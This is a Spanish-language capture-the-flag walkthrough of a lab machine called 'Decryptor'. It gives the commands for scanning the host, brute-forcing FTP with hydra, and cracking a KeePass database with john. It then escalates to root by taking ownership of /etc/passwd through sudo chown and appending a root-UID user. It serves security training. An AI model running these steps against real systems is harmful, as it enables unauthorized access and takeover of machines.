Máquina: Decryptor
SO: Linux
Dificultad: Facil
Descarga


img

1. Identifico el host en la red.

sudo arp-scan -I enp2s0 --localnet

img

2. Escaneando servicios y puertos activos en la maquina.

sudo nmap -p- --open -T5 -sCV --min-rate=5000 -n -Pn 192.168.1.8

img

3. Verificando la web que corre apache, en la fuente por debajo encuentro codigo Brainfuck.

http://192.168.1.8

img img

4. Decodeando en dcodefr, este puede ser una posible contraseña.

img

5. Probe fuerza bruta al ssh sin exito, pero al ftp si se pudo.

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p marioeatslettuce ftp://192.168.1.8:2121

img

6. Me conecto por ftp, encuentro una base de datos de Keepass, me lo descargo.

ftp 192.168.1.8 -p 2121

dir

get user.kdbx

img

7. Crackeando la contraseña de la base de datos.

kepass2john user.kdbx > key

john --wordlist=/usr/share/wordlists/rockyou.txt key

img

8. Lo abrimos con keepass, y encuentro unas credenciales.

img img

9. Me conecto por ssh como chiquero.

ssh chiquero@192.168.1.8

img

10. Encuentro un binario que puedo ejecutar como root.

sudo -l

img

11. Escalando privilegios, gtfobins.

11.1- Cambio propietario al etc/passwd

sudo /usr/bin/chown chiquero:chiquero /etc/passwd

ls -l /etc/passwd

img

11.2- Genero una contraseña y agrego un usuario con permisos root, migro a este y ya somos root

openssl passwd micontra

echo 'super:$1$AFnwwj9w$4m5nsE/FkLlU.gvCtTntR1:0:0::/home/super:/bin/bash' >> /etc/passwd

su super

img


Finalizado.